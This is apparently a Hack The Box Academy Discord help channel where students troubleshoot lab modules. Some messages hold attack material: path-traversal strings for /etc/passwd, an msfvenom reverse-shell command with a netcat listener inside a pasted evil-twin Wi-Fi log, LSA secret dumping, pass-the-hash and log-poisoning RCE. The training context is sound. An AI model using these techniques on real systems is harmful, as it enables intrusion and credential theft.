also, the module seems to have been updated, no such thing as exfiltrate.htb which was mentioned in the academy forums.
Hey @all. i am facing an issue on Module "SQL Injection Fundamentals". In the Assessment part , i don't know why i get 400 bad Request (target given )
can somebody help me with how to connect the vpn in htb lab or how to import the downloaded vpn file in htb? Do htb-lab and htb-machine have the same pwnbox??
Hit up that "Introduction to lab access" link, that should guide you.
Labs (app.hackthebox) and Academy (academy.hackthebox) are different. This channel is for discussion of Academy modules.
The Pwnbox on whichever platform you are using it on will share the same VPN configuration, and you cannot connect to the VPN from multiple places at once
On app.hackthebox, there ARE different VPN configs per lab type, such as Pro Lab, Fortress, Machines, etc etc
bro i actually understand this (lab access). but when i tried to connect it through vpn it didn't send any output and took a long time and failed to connect. i also tried troubleshooting
I'd suggest speaking in #1024429874246590575 and providing more information past "it took a long time and failed to connect", e.g. logs
..or raise a ticket with support
Need to speak to a person? Learn how to reach our support via HTB Labs.
Document and reporting practise lab. I can't find the admin credentials to log in to the report writing web app on port 443 as mentioned in the course. The admin credentials are not provided. Please help!
Hello guys! I have a question! Yesterday when I was doing a lab, I managed to retrieve a domain user's credentials and I ran the bloodhound-ce-python ingester to get bloodhound loot. However, when I imported the loot it uploaded and ingested all right, but when I tried to run some basic cypher queries such as find all domain admins I get no information. However, when I try other manual tools on the compromised machine such as Get-DomainGroupMember -Identity "Domain Admins" -Recurse, I get all domain admins, which confirms that they exist, but bloodhound does not show them. Any idea why this might be happening?
it works
still stuck?
Yess
you can DM me
Check your DMs
hello, i have a quick question about Interacting with Users page 25 in Windows Privilege Escalation module, the hint said that i should find a shared folder that my user can write to, however, i checked the smb share and i can't write to this share folder. Please help!
nxc only shows that you are granted write access to the share not the folders it contains
try to verify if you can upload files to the directories in the share
dunno if there is a method to automate that in nxc
nxc is crackmapexec btw *
just newer version
i also accessed RDP and checked icacls and it said i cannot
i'm in BUILTIN\Users and target to sccm_svc user
Guys how do I install gopherus in python3?
hmmm, those permissions can be overridden on subfolders in the department shares folder if specified
I think you should check the permissions on the subfolders too
oh thank you, let me check
you can combine those 2 commands to automate the process if you'd like
You can also use the --put-file option in automation with nxc to upload a file to each directory, and validate whether you have write access based on the tool's output
if you don't feel like reviewing the ACLs
oh nice command, can you give me the automation command that will upload the file to each directory? this one is kind of new for me. normally i just review ACLs. and thanks to you, i know i missed critical information
--put-file FILE FILE
Put a local file into remote target, ex: whoami.txt \Windows\Temp\whoami.txt
use nxc smb -h for more details
oh thank you
Hello guys, can someone help me in File Inclusion module?
in section basic bypass
When I add . to the URL it says Illegal path specified!
I tried to encode that and it didn't work
also when I try to use this url
it still says the same thing.. when I try this also
languages/../../../../etc/passwd
this time it shows nothing.
some clue?
Try going up more directories
languages/../../../../../../../../../../etc/passwd
like this?
shows nothing
hhmmmmmmmmmmm
../../../../../../etc/passwd
also this didn't work even when I encode it

God please help
Did you actually try the taught bypass methods?
Because the solution is taught in the section
I tried three of them
Non-Recursive Path Traversal Filters
Encoding
Approved Paths
I tried to do something like ..//..//
also tried to always put the languages directory in the path and encode it
||if(preg_match('/^\.\/languages\/.+$/', $_GET['language'])) {
    include($_GET['language']);
} else {
    echo 'Illegal path specified!';
}||
but when I try to visit
./languages/../../../../../etc/passwd
it does not like the ./ in the beginning. but even when I encode it doesn't work
I am stuck with something in the Using Web Proxies/Repeating Requests. I had to look into the solutions, cause I could not find anything pointing me to figuring out how to find the root where the flag is and i definitely could not get my burp suite to read it. The last time I read the flag, it was in the repeater tab (purely by accident) and I actually (also purely by accident) linked the ls and cat commands together and i got the answer. Why can't I get the repeater to read the .txt??
dm please
This command: pypykatz lsa minidump /home/peter/Documents/lsass.dmp and this command: netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa do the same thing? Or are they two separate things?
Different, one is lsass and the other is lsa
Which of the two does mimikatz do ?
The first is parsing an lsass memory dump and the second is live dumping lsa secrets from the SECURITY hive in the registry
Yes I know this but the result should be the same ?
Mimikatz does both
No, one is the lsass process memory dump the other is the SECURITY hive
Ok thank you
Sometimes some overlap but they are not the same
Skill Assessment - Parameter Logic Bugs (CWEE course) - Has anyone had trouble running the docker for the assessment as provided?
I had to add the following line to the Dockerfile
RUN apt-get update && apt-get install -y libatomic1
Now the image gets created but it won't run.
Can someone help me or give me a hint in SQLi Fundamentals - Skill Assessment? "chattr website"
dm please
what does dm mean?
inbox me
Hello, mind if I DM about this? I also might be able to help if you still need it.
Hey man I got it but if you need anything sure DM me
thanks
in Attacking Common Services - Attacking FTP they are asking the ftp port number. i tried various scans, enumerated smb and found an id-rsa (which has no permission). im so stuck
The writeups must be wrong then..
Writeups for Tier 2 also, oh dear
Regardless of whether you're running off of writeups, did you actually repeat the exercise yourself instead of just pasting the answer @proven spear ?
i just randomly typed 2121 and it accepted that but tried to scan in multiple ways the port shows its not opened
I don't know what to say, many others got the correct answer, perhaps go through the task once more to be sure you've not made a mistake somewhere
ok ill try thank you !
Randomly? Ok.. I just tested and the target is working correctly. Make sure you're on the correct VPN, and are using the target IP assigned to you
yeah because normally if the port ain't 21 in ctfs it might be 2121, just like http 8080, a guess
hi just a generic doubt, to spawn the HTB academy docker instances do we need to have subscription? or if once unlocked with cubes am I good to go?
resetting the vpn rn
You can spawn the interactive sections of any module you have access to
That includes Tier 0 (free) modules
If you unlock a module with Cubes, it is open to you to spawn AFAIK
Same as if you had completed it under a subscription
I think
Hey guys!
I'm new to windows/ad and now while I was going through the Active Directory Enumeration & Attacks - Access Control List (ACL) Abuse Primer, two seemingly contradictory sentences got my attention: "Every object has an ACL, but ..." and "If a DACL does not exist for an object, all who attempt to access the object are granted full rights."
So that means it is possible that an object has only a SACL, so the access is logged but all access is allowed since there's no DACL?
It's working fine @soft stratus - pay attention to the section content
sorry will check thanks !
finally found it lmao i was so stupid
just needed to visit /swagger/index.html
ty i actually found the answer, i had a display (html/css) problem!
Be wary of what you post @soft stratus, that is a Tier 2 module after all
my bad sorry
Q: What's the difference between ||sudo tcpdump -rX /tmp/capture.pcap|| which is in the order of the question's phrasing, and was wrong, and ||sudo tcpdump -Xr /tmp/capture.pcap|| which was correct?
||Question's phrasing: "Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches)"
[Read comes first, then showing in HEX & ASCII comes later].
||
And to provide some context the previous question said ||"please answer in the order the switches are asked for in the question."||
You can use -h and check
hello, i need help with session Pillaging for module Windows Privilege Escalation question 5: Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer.
i tried to backup for SAM and SYSTEM file but get access denied.
Can anyone give me a nudge on the Active Directory Trust Attacks - Skills Assessment, last question for compromising fabricorp.ad, I cant find a way to elevate from MSSP. The fabricorp DC is not responding on ldap from MSSP DC
Have you run Sharphound on mssp to collect on fabricorp?
Ive tried but SharpHound fails when I specify -d fabricorp.ad --domaincontroller dc05.fabricorp.ad, it states the LDAP connection attempts fail
Ive reset the lab in case it was buggy, but same issue with fabricorp LDAP not responding
You can DM if you'd like.
If the PWNBOX doesn't work for non-paid users. If I buy some cubes does that make me a paid member?
Or do I have to subscribe to annual billing?
And choose a path
Or silver membership?
hey guys, is any1 facing issues with spawning targets?
yes
Are you sure?
fairly certain considering that's how my account has been for a while
If the user doesn't have the rights to access or copy the content of a directory, we may get an Access denied message. The backup will be created, but no content will be found.
Did you check any backups already saved in repository?
oh, i already solved it haha thank you btw
Are the images in the Academy also not loading anymore for someone else?
I am doing the module User Management from the Linux fundamentals. I am stuck at 2 questions... i already tried everything with my personal brute force algorithm (my handy and the web) but i cannot find the answer for 2 questions. I am sure this is a thing where I wrote a letter in capital which i shouldn't, or the other way around. therefore i wanted to ask if anyone could help with these 2 questions:
- Which option needs to be set to lock a user account using the "usermod" command? (long version of the option) ==> My Answer is "-L"
- Which option needs to be set to execute a command as a different user using the "su" command? (long version of the option) ==> My Answer is "-c"
none of them work. I tried with sudo usermod, just usermod etc... keep getting errors. can someone help?
Use the long version of the option/flag as your answer
Having problems in pass the hash question: Using David's hash, perform a Pass the Hash attack to connect to the shared folder \\DC01\david and read the file david.txt.
Not able to find any david.txt inside the share
If you did this correctly and can access the share, but there is no flag inside the share, you likely need to reset the lab. You can DM what steps you took and your command with the empty share if you'd like me to confirm it before you reset.
You can try whatever you want, but if I remember correctly that section is pretty much a direct walk through in the lab. I could be wrong though.
Okay thanks I'll try once again
hello guys... I'm having some problems and dont know the right channel to ask for help...I was doing a module and solving the exercises via VPN. Everything worked fine... now when I got to the final exercise vpn connects, i can ping the box but I cant access the box on the browser, I cant curl the box... I cant do anything but ping... but inside the vm on the website it works fine... already change the vpn node, rebooted my system and nothing...can you guys point me to the proper place to get help?
hi, i'm working on module/226/section/2451 Suricata Rule Development Part 2 (Encrypted Traffic).
i can't reach via ssh the target. i'm connected to the academy vpn
hello guys I'm jus wondering if I'm stuck in a skill assessment should I ask for hints or no ?
i'd say depends on how long you worked on it. sometimes it takes days. i'd recommend going over the content again in the modules, sometimes there are key things in one little line you can miss. i would only come ask for help after i've been stuck for a long time, but that's just me and how i operate.
hi, i just started the academy and i'm trying to use WSL2 on the premade Windows Developer VM that you get from the Setting Up/windows module, i've already followed the steps until "Windows Subsystem for Linux 2", but i'm having issues when it ask me to type "bash" in the PowerShell i've been trying for 4 hours with no results
hello, can anyone check the Windows Privilege Escalation Skills Assessment - Part I machine, i cannot ping to the machine, i tried to reset several times. i can access to normal machine. Please help!!!!!
can anyone help me with broken authentication module, brute forcing password reset tokens
https://academy.hackthebox.com/module/80/section/767
DM me
Hello.. I need help with LFI module..
hey can u help me?
ok DM me
anyway.. I was saying that they told me to bruteforce for params in this section..
but actually the response will be always when you fuzz for params so ffuf can not know the difference
so I used a tool called fallparams and got 2 params.. then used a huge wordlist for LFI even bigger than they said I should use and found nothing
Yes youll always get a 200 response, but the length will be different
pls
anyone?
I filtered the length that I always get, which is 2309
but when I do that basically I get nothing
Windows machines dont always respond to pings
and that is normal because even if the param is used it may not change the length of the page
Yeah, theres only 2 params. And yes, the right parameters will change the length
Because it'll provide a different response
i also tried nmap and xfreerdp, crackmapexec but they did not work
hold on let me cook
ip a if you have multiple tun connections:
- sudo killall openvpn
- reconnect to the vpn
If that still doesnt fix, change vpn regions, close the vpn connection, spawn a new target
If that doesnt work, reach out to website support
so am i supposed to connect with the machine by xfreerdp and htb-student credentials?
What if I told you those parameters arent correct
OOHHHH shihihiiittttt
thaattt imparaassinnggg dont tell meeee
I mean it is fallparams creator problem not me
right?
🥺 .
It could be both
but I already used big.txt with ffuf and filtered that size.. get nothing..
anyone?
burp-parameter-names should be used to find parameters
OOHHHHHHH
ok let me see
This is in the reading btw
stop embarrassing me here!!!!! I had enough
I mean with this I can not show for months
can u help me out?
haven't done that module so i can't offer a meaningful nudge, the module probably teaches you how to get other user info
he already has the flag
nowhere in their message do they indicate they have the flag.
burp-parameter-names.txt did not work
I downloaded it from github
it should work :)
you had the right filter size for ffuf
I did not even filter nothing shows
then something you're doing is wrong
please don't tell me I am stupid
time, it hated itself, it hates you
NOOOO!!!!!!!!
many such cases
cannot connect to RDP session, it just fails or is entirely laggy. im using it on pwnbox, tried all different regions
no avail
bruh cool support thanks for the help
discord isn't an official method of support, there could be a handful of reasons for RDP being weird; https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn at the bottom has an rdp command that may be helpful for lagginess
All you need to know about the VPN Connection for Academy
thnx
im on the Pentest in a Nutshell module and the Windows System enumeration part
the question is What is the exact OS Version that WinPEAS delivers?, but winpeas output did not return system information because it didnt have enough permission to run the .exe
i did run get-computerinfo
OsVersion : 10.0.17763
the checker says its wrong
i did also run a powershell script to get the full version which was 10.0.17763.2628, but that is still not the answer the checker expects
Did you try running cmd as admin to run the .exe?
pls
I didnt go that way, because I suppose in a real case scenario i wouldnt just be able to run something as admin and wanted it to be an enumeration only challenge. Afterwards I just tried version formats until one luckily worked :D
thank you... first day... thats why i asked to be pointed to the right place... thanks for your help
Hello everyone, I need help on JS Deobfuscation module, section 6. I found the right flag, but it is not accepted. I don't know what I'm missing.
- don't work ahead
- make sure no extra whitespaces in your copy/paste
i'm not pasting the full flag per ToS
HTB{1_..r!}
Can I show you the flag in private?
sure why not
told you not to work ahead
Thank you!
Can someone help me with a module? I cannot get it working
which one
Wi-Fi Evil Twin Attacks - Skills Assessment > Q2.) Compromise a client device on the "PulseGrid"
I'm getting the HTTP requests, but no connection from client
wifi@Attica:~$ sudo systemctl restart NetworkManager
sudo airmon-ng start wlan0
Found 4 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
180 avahi-daemon
195 wpa_supplicant
199 avahi-daemon
701 NetworkManager
PHY Interface Driver Chipset
phy1 wlan0 mac80211_hwsim HTB Chipset of 802.11 radio(s) for mac80211
(mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
(mac80211 station mode vif disabled for [phy1]wlan0)
phy2 wlan1 mac80211_hwsim HTB Chipset of 802.11 radio(s) for mac80211
phy6 wlan2 mac80211_hwsim HTB Chipset of 802.11 radio(s) for mac80211
wifi@Attica:~$ sudo airodump-ng wlan0mon -w HTB -c 1
19:58:32 Created capture file "HTB-01.cap".
<SNIP>
52:DC:8C:79:EB:87 06:03:41:2B:28:E0 -29 1 - 9 0 15 PMKID PulseGrid
<SNIP>
wifi@Attica:~$ cat hostapd.conf
ssid=PulseGrid
interface=wlan1
channel=1
hw_mode=g
# Mana Attack Configuration
enable_mana=1
mana_loud=1
# WPA AP Configuration
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=PSKmismatchmaker
wifi@Attica:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell.elf
nc -lvnp 4444
Would you like to use and setup a new database (recommended)? yes
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Listening on 0.0.0.0 4444
wifi@Attica:~$ sudo ifconfig wlan1 down
wifi@Attica:~$ sudo macchanger -m 52:DC:8C:79:EB:87 wlan1
Current MAC: 8a:0f:7a:a8:09:bd (unknown)
Permanent MAC: 02:00:00:00:02:00 (unknown)
New MAC: 52:dc:8c:79:eb:87 (unknown)
wifi@Attica:~$ sudo ifconfig wlan1 up
wifi@Attica:~$ sudo hostapd-mana hostapd.conf
Configuration file: hostapd.conf
Using interface wlan1 with hwaddr 52:dc:8c:79:eb:87 and ssid "PulseGrid"
wlan1: interface state UNINITIALIZED->ENABLED
wlan1: AP-ENABLED
MANA - Directed probe request for SSID 'PulseGrid-INT' from 7e:88:06:b5:71:76
MANA - Directed probe request for SSID 'PulseGrid' from 06:03:41:2b:28:e0
Unsupported authentication algorithm (3)
handle_auth_cb: STA 06:03:41:2b:28:e0 not found
MANA - Directed probe request for SSID 'PulseGrid' from 06:03:41:2b:28:e0
MANA - Directed probe request for SSID 'PulseGrid-INT' from 7e:88:06:b5:71:76
MANA - Directed probe request for SSID 'PulseGrid' from 06:03:41:2b:28:e0
MANA - Directed probe request for SSID 'PulseGrid-INT' from 7e:88:06:b5:71:76
MANA - Directed probe request for SSID 'PulseGrid' from 06:03:41:2b:28:e0
MANA - Directed probe request for SSID 'PulseGrid-INT' from 7e:88:06:b5:71:76
MANA - Directed probe request for SSID 'PulseGrid' from 06:03:41:2b:28:e0
omg HTB even teach evil twin
I know, I know. I think we have talked before. It is still about them lxc containers.
My skill in networking is not good enough to understand how to get them running on my laptop
there is a thing i don't understand in the file inclusion module in the section of the log poisoning
why after i add in the log file the php script to get the shell and then run a command using this shell
like index.php?language=/var/lib/php/sessions/sess_asttmm182ahi117n0eqnv5lfpu&id=ls / if i ran another command it don't work until i send another request with the php rce ?
The module doesn't require you to mess with creating containers. Just move on
Because it doesn't update until the refresh, timing stuff
I know, can I shoot you a DM?
I'm not familiar enough with lxc/lxd to be of any help
It is more about networking, I guess.
I have no problem creating those containers. That works just fine. Problem is that I don't have access to the internet.
On my VM it works without a problem, but on the laptop I am really struggling to understand the process of bridging or forwarding the connections?
I know it is not essential to have those containers, but I see it as an opportunity to learn and get a better understanding of networking.
That's gonna be a lot of Google troubleshooting. I suggest moving on and coming back to this at a later date
the final boss
Alright, I have spent a lot of time on this but I have no idea if I am even on the right track.
and I will never use fallparams again
Hey ppl I could use some help with the network foundations module - components of a network. It doesn't take my answer in the first question: what cable is used to transmit data over a long distance with minimal signal loss? It's clearly fibre-optic IMHO but it tells me it's wrong?
Are you sure you're spelling it right? (Also don't include the word "cable")
K thx
In WI-FI Evil Twin Attacks, for anyone with the fluxion error message: "aborted, xterm session failed", typing this command `xhost +SI:localuser:root` fixed it for me.
Next question related to the network foundations DNS: i think there's a logical error since the first thing a PC checks in the DNS Resolution Process is not the local DNS Cache but the Hosts file since the hosts file overrides any entries made in the cache - or am i wrong?
@fathom pendant hey can I ask you about something please
i need help about that + 1 Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
For fucks sake
<@&861185840277487616>
I'm not able to help with content, no. Ask for guidance, but without spoiling or pasting massive output like that which may spoil content above Tier 0 https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines
?
omg what is that
You didn't even read what I said
Yes, you can't just post module information like that above Tier 0, please read the above link and the channel topic
Someone may or may not be able to hop in to chat with you
I literally just said that I'm unable to help with content
sry im working for 12 hours constant and now that....
chill
yes
I'm perfectly chill, thank you.
the wordpress one
Thank you aw0ken
yes but my issue is to find the vuln in the output, but I'm not allowed to post it here
Hi, I am doing the "Online PIN Brute-Forcing Using Reaver" however reaver continuously gets "EAPOL START request" when trying to bruteforce the pin. Even after extending the wait time. Here is my command:
```
sudo reaver -i wlan0mon -vv -b 4A:60:21:C3:7E:8D -c 1
```
Anything I am missing here?
You'll get a better response if you state the module/section/question you're on
Wifi Pentesting - Online PIN Brute-Forcing Using Reaver
from what I have found online it seems others have had the same issue, not knowing if it's expected to take over an hour, or if reverting the machine is required, but from what I see, it just constantly times out after sending the EAPOL request
I don't think that's a module
my bad: Attacking Wi-Fi Protected Setup (WPS)
Online PIN Brute-Forcing Using Reaver
Hey all, I'm wracking my brain on what I'm doing wrong with the DnsAdmins module. I've reset the target probably 4 times now, I've rebuilt the adduser.dll numerous times, but nothing seems to make my process's results match the workflow. I try loading the DLL as a non-privileged user, and it passes, it doesn't fail. I then try loading the DLL as a member of DnsAdmins, it does say that I am a member of DnsAdmins after all. This passes. I try to then get my SID for "netadm" and it says it's an invalid query. I can't get past this, because even though the sc command says I have RPWP, when I stop/start the dns service it doesn't change anything, and when I confirm the group membership for "Domain Admins" it doesn't list me as a member of domain admins. I've even tried using the adduser.dll from C:\Tools, and that doesn't change anything either.
@fiery light Please do not reveal attack paths for skill assessments
Hi everyone, can someone help me with this question under Javascript deobfuscation module?
I have got a flag but that is not being accepted as an answer.
Best to say which section too
deobfuscation section
Make sure you're using the whole format, ie. HTB{flag_here} not just flag_here
yes I am using the whole HTB{} format
You can DM me the flag you have
Check for additional spaces before/after the flag
it's also a common section where people work ahead of what's expected
they get it deobbed then work ahead with the deobbed code
Module Information gathering - web edition section web archives. When i go to the hackthebox website on the wayback machine on these two dates, i get this page and I can't find the answers. The problem is with these two questions only.
Sorry for the atrocious quality
if you read back through the section you'll find out that hackthebox.com wasn't always a .com
Thank you
Are there any plans to improve performance of any of the modules that use RDP?
Module Android Application Dynamic Analysis Section Exploiting WebViews. I have the flag but I can only visually see it and can't copy and paste. There's a mix of letter 'I' and 'l' which makes it confusing. I submitted a few times but the flag is wrong. Anyone can help?
i am stuck at the same thing, did you solve the module?
Module "Android Application Dynamic Analysis" Section "Insecure Library Load Through Deep Linking" - I am following the module but my app doesn't update to v2.0 when I click the Update link. I think it's causing problems for the module assessment. Anyone can help?
Windows Process Injection: Can get the Process Injection Payload to run fine on DEV but not on the Target Machine. Have also double checked and ran the Solution which also still doesn't work.
I have been making a C# Console App as RELEASE/x64 like some other advice people have been given but it's still not working :/
Anyone got a workaround?
can somebody tell me that accessing linux fundamentals and its modules there are some modules which have some explanation but when you see the questions that are present below the module, these questions are very different from those commands that i just learnt. for example i learned cat /etc/passwd command and the question they asked about ports why ??
I'm pretty sure I just followed along with what was presented in the section and had no problems with it working on DEV and the TARGET host.
Okay ty, will just try again at some point
nope some modules of linux are not connected to the questions that are asked
This is by design, not to the distorted example you've mentioned but the Lab you launch at the end is designed to test your understanding of the material, in most cases they require you to launch the lab to figure out the specifics of that environment and answer accordingly.
To complete Footprinting lab, I used xfreerdp3, but I would like to know how may I specify the "type" / language of the keyboard? Is there an option for this? Thank you :).
There is, change the system language of the machine you're on. It uses that as far as I know
keyboard settings, for example US to UK, I change the keyboard layout to UK and delete the US one. Then connecting to xfreerdp it uses UK then
I don't want to edit my own system...
I would like to know if there is an arg in the command.
Understood, when you find out let me know... maybe try the man page.
you can use xfreerdp3 with /kbd option
Noice!
And there is a value with this arg or it's auto selected?
you can use /kbd-list with it to list the keyboard languages
I think that's an older syntax, better to use /list:kbd
Alright thanks!
https://www.gsp.com/cgi-bin/man.cgi?section=1&topic=xfreerdp3 i'm just going off this; which does note /list:kbd is the syntax
Yeah this one is deprecated
can I install android studio and use its emulator on Kali virtual machine ?
yeah probably
anybody did Wi-Fi Evil Twin Attacks - Skills Assessment ?
I am stuck at 1st and 2nd question
I started a module called network foundations and I reached Skills Assessment Ch 3, I followed the instruction, entered passive mode (10,129,166,17,194,11) and calculated the real FTP port (P1 * 256 + P2 = 194*256 + 11 = 49675), after that I typed nc -v 10.129.166.17 49675 which returned connection refused. What did I do wrong? How should I fix it. Thanks.
try with -nv not just -v
For future students. In Wi-Fi Evil Twin Attacks, the WifiPhisher plugin update attack walkthrough didn't work for me on the "twins" RDP box. I think the MSFVenom payload generator on the box might be bugged. I was able to transfer a working MSFVenom shell.elf payload from my own Kali instance to the "twins" box and get the shell to connect from the victim.
I tried -nv, but there is still a connection refused pop up, no idea why the port is not open
WEP attacks - korek chop chop attack. Has anyone completed this? Something in this module isn't explained well and I'm missing something. The attack doesn't seem to work.
no I already did, it won't work, what you can do is install android studio directly on windows and connect to it from vm
I've spent hours to try it, it didn't work, I will try your idea
Hey all, I'm working on the SA2 exercise (VBScript → payload execution → AMSI/CLM context) for the Introduction to Windows Evasion Techniques module.
I have a VBScript in C:\Alpha\SA2 that runs an EXE from C:\Windows\Tasks.
When I run the chain manually as my assigned user, the EXE runs fine, AMSI gets patched, and the payload executes.
However, when the victim user runs the exact same VBS (via the provided harness command), the behaviour is very different:
- The VBS definitely runs (confirmed in the harness logs).
- Defender does not block the script.
- The EXE is never executed:
- no debug file from the EXE,
- no network activity,
- no errors from VBScript,
- harness times out after ~45 seconds.
AppLocker shows that binaries in C:\Windows\Tasks should be allowed for the victim user, so on paper it should run.
Because the EXE never executed, the only way I could solve the exercise was to avoid PowerShell entirely and use pure VBScript to read the flag directly from the victim user's Desktop.
My question is: Is this the intended path for SA2, or is the goal to actually get a reverse shell (or PowerShell execution) as the victim user? If a revshell is expected, I can't figure out how to get past whatever is preventing the EXE from executing.
Any hints or clarification would be appreciated!
if you can't connect to adb from your vm, open an ssh server from your windows machine (Start-Service sshd) and try to connect to the specific port of adb in your vm. for example here the adb is running on port 5555 on my windows machine, on kali: ssh -L 5555:127.0.0.1:5555 username@<my-windows-ip> then adb -s 127.0.0.1:5555 shell and you will get the shell of your android device
Thank you very much
any hints for : module 171 section 1692 stuck on it for days
anyone able to give me a nudge on the XSS skill assessment ( can't seem to find the vulnerable field)? (got help already)
can you help me with question 1 and 2 in skill assessment. I missed something.
Hey all, I've made it to the dreaded thick client apps module of CPTS. I am stuck. I have followed the module step by step to create the .bat file from restart-oracleservice by modifying the Temp folder permission for cybervaca. Tried this multiple times and the .bat file isn't created in the Temp\2\ directory. Procmon shows a bat file is made in some \Temp6BAC.tmp \ directory, but it isn't accessible when I try to navigate to it
Hi there. I've only recently started with htb and currently working myself through the 'Getting Started' module. Currently doing the nmap exercise:
Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on.
I'm running an nmap using the following command:
nmap -sV -sC -p- <target ip>
The first 40% or so of the portscan progresses quickly, but then slows down to a crawl to an extent the target will run out of life before it completes. Is this expected behavior? How do I avoid getting throttled? Using a pwnbox.
```
Stats: 0:00:55 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 41.51% done; ETC: 11:33 (0:01:18 remaining)
Stats: 0:00:58 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 41.58% done; ETC: 11:33 (0:01:23 remaining)
Stats: 0:02:42 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 42.05% done; ETC: 11:37 (0:03:43 remaining)
Stats: 0:30:19 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 44.36% done; ETC: 12:39 (0:38:02 remaining)
```
hope i wont get flagged for spam... but anyways
do you guys recommend any htb module for a job interview for handling incidents like spam/phishing/etc?
run man nmap and look at what everything is doing if you are unsure. There are some useful switches that might help nmap scans not waste time with ports that are not open and only run tests on ports found to be open. This can be a major reduction in traffic.
how is hashcat module tier 2 but password attacks tier 1? i find the second one significantly harder
The first time one starts msfvenom it prints some stuff about "thanks for using msfvenom", so if your first call to it directly pipes into the elf file you get that message as part of the same file and it doesn't work as a rev shell anymore. If you run it a second time it works fine
I had to switch the VPN, in aireplay-ng you need to select a packet from the client to the AP that is not too small. On one of my instances I would just not get such a packet, it would only give me <40 byte packets or not originating from client/to ap. Once I switched the vpn region it worked immediately
you are running all scripts (many) against all ports with -sC and -p-. It is much faster if you run -p- without -sV and -sC first and then rerun -sV and -sC only on the discovered ports
Yo guys im stuck on IDOR mass enumeration in web attacks, the browser says waiting for weloveiconfonts.com, the browser times out when trying to manually reach this domain
Is there a way to skip reaching that domain within the browser ?
cURL works fine for the target website
Add it to /etc/hosts with 127.0.0.1 as the IP address to avoid waiting for the timeouts
If you really don't need it
It works. Check the IP Firefox is checking. Might need to flush its cache
Browsers cache dns too
Use a different browser or private browsing mode
Yeah, a different browser worked
Thanks yall

im still on the same section
im supposed to perform IDOR on the uid parameter of documents.php, and get all the document of the first 20 users
however, doing so im not getting any files
dunno if sharing the command is a spoiler
Bump.
for the HackTheBox Attacking Wi-Fi Protected Setup (WPS) in the tasks it's very laggy and it takes a lot of time to get the PSK. is this a global problem or from my side only? (Please note that I'm using PwnBox not VPN)
you can DM me if you are still stuck
There's no modules specific to job interviews. There is a module related to 'Incident Handling Process' as part of CDSA
Make sure your request matches what the server expects
aaa
guys in the hacking wordpress module Wappalyzer and even wpscan say that the website does not use wordpress
in the skill assessment
Perhaps you need to find the subdomain that the wp site is on instead of the base webpage.
they did not teach you how to do that in the module btw
Well you're provided with a host to add to your hosts file
one thing about learning- you are expected to do some outside research, find other ways. when you get to more advanced modules tier2 and above it's very useful to read the readme for the tools you use, and experiment with them and how they work. not just using a tool but understanding a tool is very beneficial
when you know how something works, you can troubleshoot it and understand why it's not working
hi guys i have an issue with finding flag.txt on the system. im already in the system (msf payload). In the question task it talks about an Admin file with flag.txt. i was in /root and in the entire system but no trace? Dm me for more spec infos. thanks
did you look on the desktop and home directory it's often there
am cooked
It will hopefully be on the top of rockyou.txt lmao
Not usual to run rockyou on wordpress in general
I just do it when I have a lot of other work to do
Yes even in the module they do it so it's ok I guess if you have time
I started it when I got usernames then do other things
btw
you should get a password for one of the users with that
but not the admin
🥺 ...
For which user are you looking for the password ?
You will never have to wait for 1 hour of bruteforcing
yes
I just have to bruteforce for other user for 3 minutes maybe
but I just keep trying on admin. I forget that running
Oh ok misunderstanding :))
find / -name flag.txt 2>/dev/null
aaaaaa
There's a 1 year VIP+ giveaway going on in the giveaway channel #giveaways message
well, 5 of them being given away
Hey all, can anyone help me understand this? So, I'm doing an exercise (nmap module), get dns version. The HTB answer nmap -Pn --disable-arp-ping -p53 -sU -sC 10.129.2.48 -v --packet-trace ... gets the result, but if you try any other way like this one nmap -Pn --disable-arp-ping -sU -sC -p53 10.129.2.80 --packet-trace, you don't get the result; the other one always gets open|filtered with no results. Please, anyone help me understand this
Two different targets?
Has anybody seen this error:
[ERROR][com.freerdp.core.transport] BIO_read retries exceeded when trying to RDP through the VPN and Ligolo? Fairly sure it is not a credential problem (nxc says +) but I've never seen it before and can't get RDP connection
I apologize for the duplicate post, but I can't get this issue to resolve.
I've made it to the dreaded thick client apps module. I am stuck.
I have followed the module step by step to create the .bat file using the restart-oracleservice executable and modified the Temp folder permission for the user cybervaca.
Tried this multiple times and the .bat file isn't created in the Temp\2\ directory. Procmon shows a bat file is made in some \Temp\6BAC.tmp\ directory (always some 4 character string followed by .tmp), but the directory doesn't exist when I try to navigate to it.
I know this module is a pain for everyone, but I can't even get past step one. Any insight is greatly appreciated
dm me
most likely network /connectivity issue
I had problems yesterday with RDP... Spoke with support and they gave me a VNC connection which worked
can anybody help me with that i tried every open port (8080,80, 20,22 ,2020) but every time it gave same problem
I do however need help with **Credential Hunting in Network Shares**. Is the answer even in the Snaffler output? I found a few passwords, but none of them are the answer...
Restart lab?
In the module, they teach several password patterns to search for!
thanks bro it actually worked
Exactly, which is why I am wondering if the output is correct? I found a few passwords, but none worked. Then I found two hashed passwords that did not work either. However, if you say that password is in the Snaffler, then I guess I just need to keep looking
I thought it may be a trick question and even tried things like $password
I prefer to use manspider or netexec. To specify the types of patterns I need you to look for.
